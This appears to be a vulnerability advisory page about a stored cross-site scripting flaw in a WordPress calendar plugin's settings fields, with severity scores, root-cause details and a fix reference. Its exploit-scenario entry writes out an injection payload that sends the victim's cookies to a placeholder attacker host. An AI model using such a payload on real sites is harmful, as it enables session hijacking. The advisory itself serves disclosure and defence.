Severity by source
AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
Changed UI:N to UI:R because scope-changed impact requires a second user (victim admin) to navigate to the settings page for the XSS payload to fire against them.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Lockme OAuth2 calendars integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'App ID' setting in all versions up to, and including, 2.11.0. This is due to insufficient input sanitization and output escaping. The register_setting() call on line 197 lacks a sanitize callback, allowing unsanitized data to be stored via update_option(). When the settings page is rendered, the stored value is echoed directly into an HTML input's value attribute without esc_attr() on line 212. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in the settings page that will execute whenever a user accesses the plugin settings page. Multiple fields are affected: App ID (client_id), App Secret (client_secret), Bookings ID prefix (id_prefix), and API domain (api_domain). This vulnerability is particularly impactful in WordPress multisite installations where administrators of individual sites should not be able to execute JavaScript affecting other users.
AnalysisAI
Stored Cross-Site Scripting in the Lockme OAuth2 Calendars Integration WordPress plugin (all versions through 2.11.0) permits authenticated administrators to persist arbitrary JavaScript in four settings fields - App ID, App Secret, Bookings ID prefix, and API domain - which then executes in the browser of any user who loads the plugin settings page. The root cause is a missing sanitize callback in register_setting() (Plugin.php:197) paired with unescaped output via direct echo into an HTML value attribute without esc_attr() (lines 212, 223, 245, 256), a classic CWE-79 dual-failure pattern. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated WordPress user account with administrator-level privileges or higher - the CVSS vector PR:H confirms this. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Real-world risk for this vulnerability is moderate-to-low in most single-site WordPress deployments but meaningfully elevated in WordPress multisite networks. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained WordPress administrator credentials - whether through credential stuffing, a compromised admin account, or social engineering - navigates to the Lockme Calendars Integration settings page and submits a value such as " autofocus onfocus="fetch('https://attacker.example/steal?c='+document.cookie)" into the App ID field. The payload is stored unsanitized in the wp_options database table. … |
| Remediation | The primary fix is to update the Lockme Calendars Integration plugin to a version that incorporates the upstream patch committed at WordPress SVN revision 3495564 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3495564%40lockme-calendars-integration&new=3495564%40lockme-calendars-integration). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-43124
GHSA-6q4h-2q4c-jmg7